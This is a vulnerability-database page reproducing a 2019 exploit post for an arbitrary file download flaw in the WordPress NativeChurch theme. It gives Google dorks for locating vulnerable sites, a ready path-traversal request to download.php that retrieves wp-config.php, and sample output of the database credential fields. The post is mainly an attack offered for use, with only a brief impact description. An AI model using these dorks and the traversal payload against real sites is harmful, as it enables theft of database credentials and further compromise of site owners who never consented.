Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKingSkrupellosPACKETSTORM:151851
HistoryFeb 25, 2019 - 12:00 a.m.

WordPress NativeChurch Multi-Purpose 5.0.x File Download

2019-02-2500:00:00
KingSkrupellos
packetstormsecurity.com
45
JSON
`####################################################################  
  
# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 26/02/2019  
# Vendor Homepage : themeforest.net  
# Software Information Link :   
themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446  
# Software Affected Versions : WordPress From 3.9 to 5.0.x   
Compatible with Bootstrap 3.x - bbPress 2.5.x  
From WooCommerce 2.1.x To WooCommerce 3.4.x,   
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"  
inurl:''inurl:/wp-content/themes/NativeChurch/download/''  
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]  
CWE-23 [ Relative Path Traversal ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
NativeChurch is a powerful WordPress Theme designed & developed for Church,   
  
Charity, Non-Profit and Religious Websites and comes handy   
  
for Portfolio/Corporate Websites as well.  
  
####################################################################  
  
# Impact :  
***********  
* The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers   
  
download arbitrary files because the application fails to sufficiently sanitize user-supplied input.   
  
An attacker can exploit this issue to download arbitrary files within the context   
  
of the web server process. Information obtained may aid in further attacks.  
  
Attackers can use a browser to exploit this issue.   
  
* The software uses external input to construct a pathname that should be within a   
  
restricted directory, but it does not properly neutralize sequences   
  
such as ".." that can resolve to a location that is outside of that directory.  
  
####################################################################  
  
# Arbitrary File Download Exploit :  
******************************  
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php  
  
# Example Informations about MySQL WordPress Configuration File :  
***********************************************************  
/** Nom de la base de donnees de WordPress. */  
define('DB_NAME',   
  
/** Utilisateur de la base de donnees MySQL. */  
define('DB_USER',   
  
/** Mot de passe de la base de donnees MySQL. */  
define('DB_PASSWORD',   
  
/** Adresse de l'hebergement MySQL. */  
define('DB_HOST',   
  
###################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`
JSON